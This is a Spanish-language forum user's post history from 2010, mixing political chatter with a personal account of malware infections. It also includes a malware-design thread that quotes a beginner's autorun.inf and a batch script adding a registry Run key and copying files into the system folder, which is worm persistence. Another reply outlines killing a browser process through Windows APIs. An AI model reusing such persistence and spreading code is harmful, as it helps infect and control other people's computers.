Busca el MSN Nighthemare de mazard alli hay un buen ejemplo de hook a recv ...
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#43
Foro Libre / Re: Navegar en Internet con Windows es como ir a la guerra XD
5 Octubre 2010, 05:00 AM
Esta respuesta iva en otro post excuseme 
#44
Análisis y Diseño de Malware / Re: Me ayudais
4 Octubre 2010, 18:44 PMCita de: SockMon en 3 Octubre 2010, 02:22 AM
Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.Código (bash) [Seleccionar][AutoRun]
open=data31.exe
q seria el autorun
-----------------------------------------------------------------------Código (bash) [Seleccionar]@echo off
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
"Data" /d "data34.bat"
copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
exit
este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?
Con ese auto run solo infectaras pc en africa y algunos lados de suramerica que no usan so actualizaos ni mucho menos av nuevos .....
%systemroot% si fura tan facil copiarce alli ........ al paso que vas ese worn solo infectara viejas pentiuns 2 en etiopia, somalia y bangladesh y todos esos sitios donde microsoft no tiene oficinas comerciales
......
#45
Foro Libre / Re: Navegar en Internet con Windows es como ir a la guerra XD
4 Octubre 2010, 18:21 PM
Bueno hay sierta informacion que solo se puede buscar en el inframundo y tiene sus riesgos ... aveces el exeso de confianza te lleva a meterte donde sabes que no debes pero baaa, la ultima vez que formatie el pc por infeccion fue hace mas d eun año con el virus conficker y fue la vez que mas dure infectado una semana XD 
..... de alli para aca aparte del Avira tengo el CNAV Anti Virus Chuck Norris que es mas potente y no se puede terminar ni mucho menos deshabilitar en ring 0 ya que esta instalado detras del teclado ........
Lo mas que he durado son 6 horas infectado, y tengo 4 clientes de poker todas las cuentas con pasta, hago mis transacciones en internet y nunca me ha hecho falta un bolivar ..........
El punto del Post era que una infeccion cada quince dias es lo normal pero en una semana me han tratado de juankear 4 veces y paginas de confianza muy conocidas estan infectadas con exploits, lo que me lleva a la conclusion que la actividad del malware se ha elevado mucho ultimamente ...
... aveces el exeso de confianza te lleva a meterte donde sabes que no debes pero baaa, la ultima vez que formatie el pc por infeccion fue hace mas d eun año con el virus conficker y fue la vez que mas dure infectado una semana XD ..... de alli para aca aparte del Avira tengo el CNAV Anti Virus Chuck Norris que es mas potente y no se puede terminar ni mucho menos deshabilitar en ring 0 ya que esta instalado detras del teclado ........ Lo mas que he durado son 6 horas infectado, y tengo 4 clientes de poker todas las cuentas con pasta, hago mis transacciones en internet y nunca me ha hecho falta un bolivar
..........El punto del Post era que una infeccion cada quince dias es lo normal pero en una semana me han tratado de juankear 4 veces y paginas de confianza muy conocidas estan infectadas con exploits, lo que me lleva a la conclusion que la actividad del malware se ha elevado mucho ultimamente ...
#46
Foro Libre / Navegar en Internet con Windows es como ir a la guerra XD
3 Octubre 2010, 06:31 AM
Bueno no se si los usuarios han notado un fuerte crecimiento en paginas infectadas y campañas de propagacion de malware ![:-\](https://forum.elhacker.net/Smileys/navidad/undecided.gif ":-\")
.... en una semana he sido infectado 4 veces solo navegando y accidiendo a paginas de "confianza"..
Explico:
Hace 5 dias fui victima de un muy picaro worm P2P muy bien elaborado que igual me fue muy facil eliminar...
Dos dias despues descargue un Pdf y venia con su respectivo regalito ...
un lindo troyano bancario el cual a las pocas horas de infeccion intente acceder a mis cuentas bancarias y al escribir el sitio del banco en el exploraror me aparecio un lindo cartelito del firewall de windows diciendome que IExplorer necesitaba permisos para "Abrir Puertos" ....... Otra vez avira solito se lo cargo .......
Hace dos dias enfrente un monstruo del cual no hay ninguna info en internet, y el puto binario me lo cargue por lo que no pude recojer una muestra, la custion empezo al ingresar a una pagina cuyo nombre omito por custiones personales .... lo cierto es que IExplorer Peto por lo que lo termine desde el taskmgr ..... de una vez se me prendio la luz de la desconfianza 
...... Al rato Avira quedo nockaut , y el firewall de windows quedo desactivado de ninguna manera pude reiniciar los dos servicios al ver esto desconecte el modem y lo guarde en una gabeta con llave ...... SO Xp actualizado, avira version completa actualizada .. IExplorer 8 actualizado ..... Prosigo reinicie en Modo a prueba de fallos y pude arrancar el avira..... hice un scan dos trollanos de caracteristicas diferentes guardados en appdata, y Userprofile, facil de borrar el tercero era la peor de mis pesadillas un archivo .Sys guardado en %Systemroot%\\drivers detectado por heuristica como TR\Agent586 a lo cual por su puesto avira no pudo borrar ..... .......
El archivo se alojo como kijpdhl.sys y creo una llave en HKLM\\Curren controlSet2\\Services .... con el nombre kijpdhl.sys y claro no podia ver lo que habia dentro ni siquiera como administrador ... Lo mas lindo fue al intentar buscar el archivo no podia abrir la carpeta drivers para acceder tuve que hacerlo desde cmd y escribiendo la palabra system32 con codigos Alt es decir%%
Al ver todo esto solo quedo el plan c que tengo para estos casos .... ¿Formatear? pues no 10K canciones bajadas por el emule incontable codigo y documento que no tenia donde meterlos XD .... Asi que desempolve un HD con una version limpia de windows y avira instalado, instale el had y arranque la maquina por alli para luego cargarme el driver ese XD .......
Sorpresa: al hacer esto los driver de la tarjeta de red quedaron daños y no hubo forma humana de arreglar esto por lo que tuve que reinstalar todos los drivers ......
El Archivo Kijpdhl.sys pesa 505KB
que es demasiado para ser malware asi que debe tener muchos juguetes para entretener a las victimas 
.......
Hoy intente leer esta noticia....
Y me aparecio un lindo cartelito del IEXPLORER diciendome que mi PC estaba bajo ataque de malware Por lo que estoy corriendo el AV de nuevo 
....
Voy a desempolvar una vieja version de OpenSuse, y la instalare en una particion para ver si puedo navegar en paz .....
Windows esta bajo ataque hoy mas que nunca XD .....
.... en una semana he sido infectado 4 veces solo navegando y accidiendo a paginas de "confianza"..Explico:
Hace 5 dias fui victima de un muy picaro worm P2P muy bien elaborado que igual me fue muy facil eliminar...
Dos dias despues descargue un Pdf y venia con su respectivo regalito ...
un lindo troyano bancario el cual a las pocas horas de infeccion intente acceder a mis cuentas bancarias y al escribir el sitio del banco en el exploraror me aparecio un lindo cartelito del firewall de windows diciendome que IExplorer necesitaba permisos para "Abrir Puertos" ....... Otra vez avira solito se lo cargo ....... Hace dos dias enfrente un monstruo del cual no hay ninguna info en internet, y el puto binario me lo cargue por lo que no pude recojer una muestra
, la custion empezo al ingresar a una pagina cuyo nombre omito por custiones personales .... lo cierto es que IExplorer Peto por lo que lo termine desde el taskmgr ..... de una vez se me prendio la luz de la desconfianza ...... Al rato Avira quedo nockaut , y el firewall de windows quedo desactivado de ninguna manera pude reiniciar los dos servicios al ver esto desconecte el modem y lo guarde en una gabeta con llave ...... SO Xp actualizado, avira version completa actualizada .. IExplorer 8 actualizado ..... Prosigo reinicie en Modo a prueba de fallos y pude arrancar el avira..... hice un scan dos trollanos de caracteristicas diferentes guardados en appdata, y Userprofile, facil de borrar el tercero era la peor de mis pesadillas un archivo .Sys guardado en %Systemroot%\\drivers detectado por heuristica como TR\Agent586 a lo cual por su puesto avira no pudo borrar ..... .......El archivo se alojo como kijpdhl.sys y creo una llave en HKLM\\Curren controlSet2\\Services .... con el nombre kijpdhl.sys y claro no podia ver lo que habia dentro ni siquiera como administrador
... Lo mas lindo fue al intentar buscar el archivo no podia abrir la carpeta drivers para acceder tuve que hacerlo desde cmd y escribiendo la palabra system32 con codigos Alt es decir%%Al ver todo esto solo quedo el plan c que tengo para estos casos .... ¿Formatear? pues no 10K canciones bajadas por el emule incontable codigo y documento que no tenia donde meterlos XD .... Asi que desempolve un HD con una version limpia de windows y avira instalado, instale el had y arranque la maquina por alli para luego cargarme el driver ese XD .......
Sorpresa: al hacer esto los driver de la tarjeta de red quedaron daños y no hubo forma humana de arreglar esto por lo que tuve que reinstalar todos los drivers ......
El Archivo Kijpdhl.sys pesa 505KB
que es demasiado para ser malware asi que debe tener muchos juguetes para entretener a las victimas .......Hoy intente leer esta noticia....
Citarhttp://www.csospain.es/Nuevo-uso-de-la-botnet-Zeus-Robar-codigos-de-acceso-bancario/sección-actualidad/noticia-100333
Y me aparecio un lindo cartelito del IEXPLORER diciendome que mi PC estaba bajo ataque de malware
Por lo que estoy corriendo el AV de nuevo ....Voy a desempolvar una vieja version de OpenSuse, y la instalare en una particion para ver si puedo navegar en paz .....
Windows esta bajo ataque hoy mas que nunca XD .....
#47
Foro Libre / Re: Huelga de policía pone en caos a Ecuador
1 Octubre 2010, 16:24 PM
Que paso con el Policia que fue herido de bala en el momento que salian las camionetas del hospital, en un primer momento crei que habia sido arrollado pero luego al ver el video otra vez se ve que se desplomo por un impacto de bala .... Joala y no sea ese el muerto la verdad que las imagenes de ese policia agonizando me impacto 
.......
la verdad que las imagenes de ese policia agonizando me impacto .......
#48
Foro Libre / Re: Huelga de policía pone en caos a Ecuador
1 Octubre 2010, 05:46 AMCita de: [D4N93R] en 30 Septiembre 2010, 21:55 PM
Carlos, no se tu opinión política dado que no hemos casi hablado, pero te digo, que es ahora o nunca.
No me gustan los posts sobre política en este foro, pero es algo que hay que entender ya que forma parte de nuestras vidas.
Un saludo, y que bueno que te encuentras bien, justo hoy me dijeron que eres de Ecuador y que no sabían nada de tí. Por lo que ya sabemos que estás bien.
Se jodieron
ahora tienen a correa hasta el 2021 
ya nuestro comandante le dira los pasos a seguir ...
#49
Análisis y Diseño de Malware / Re: Problema al sobrescribir
1 Octubre 2010, 05:41 AM
TerminateProcess, GetExitCode, ProcessNext32 lee las msdn de esas apis con apis no hay falla a no ser que el proceso este protegido en ring 0 
eso de estar llamando cmd a cada rato es asqueroso
La cuestion es enumerar los procesos con ProcessNext32 comparas el nombre con firefox.exe si coincide obtienes el pid del proceso con OpenProcess y luego obtienes el exitcode con GetExitCode pasandole el pid como parametro y al final lo terminas con TerminateProcess pasandole el exitcode y el handle como parametro ....
eso de estar llamando cmd a cada rato es asqueroso La cuestion es enumerar los procesos con ProcessNext32 comparas el nombre con firefox.exe si coincide obtienes el pid del proceso con OpenProcess y luego obtienes el exitcode con GetExitCode pasandole el pid como parametro y al final lo terminas con TerminateProcess pasandole el exitcode y el handle como parametro
....
#50
Foro Libre / Re: VENEZUELA: ISPs publicas estan blockeando el acceso a foros de OPOSICION
28 Septiembre 2010, 23:24 PMCitarPero que pesados, aun siguen con el tema del racionamiento cuando habían razones de sobras para realizarlo. ¬¬
Realmente hubieron dos razones Sequia y desinvercion gubernamental por mas de 10 años
no se a usted pero a mi se me iva la luz de 8 a 10 am y luego de 6 a 8pm y dado a que mi trabajo depende directamente de la electricidad perdi mucho dinero y tiempo .......CitarPero vamos que aquí en Venezuela no te revisan los correos para ver si eres un "TERRORISTA". XDD
Si eres lider de oposicion si te revisan no solo el correo ademas te pinchan el telefono .. Yo estoy deacuerdo de hacer esto con delincuentes y corruptos el problema es que no he sabido de ningun rojo que lo hayan intervenido ...... ¿Todos son santos? noooooo hay mucho neoburgues y corrupto en el proceso y eso usted lo sabe Ex-Camarada .....
Lo de Cantv boicoteando paginas de oposicion eso es algo que siempre han negado y ya vez si es cierto XD ..... Cuantas cosas mas niegan ellos que es cierto ...
CitarLa libertad la confunden con libertinaje, paginas como elchiguirebipolar, son muestra de ello y mantengo fuerte opinión de que deben ser CERRADAS, repito, las libertades y derechos llegan hasta donde comienzan los de otros y paginas como esas violan los derechos de muchos otros
Pues el sevidor de chiguirebipolar.net (173.236.153.21) Esta en Brea California USA ....
su ISP es: NEW DREAM NETWORK LLC... Manda una comision del SEVIN hasta alli ha cerrar el server .. ........La Extinta Asamblea:
LOL Paz Excamarada .....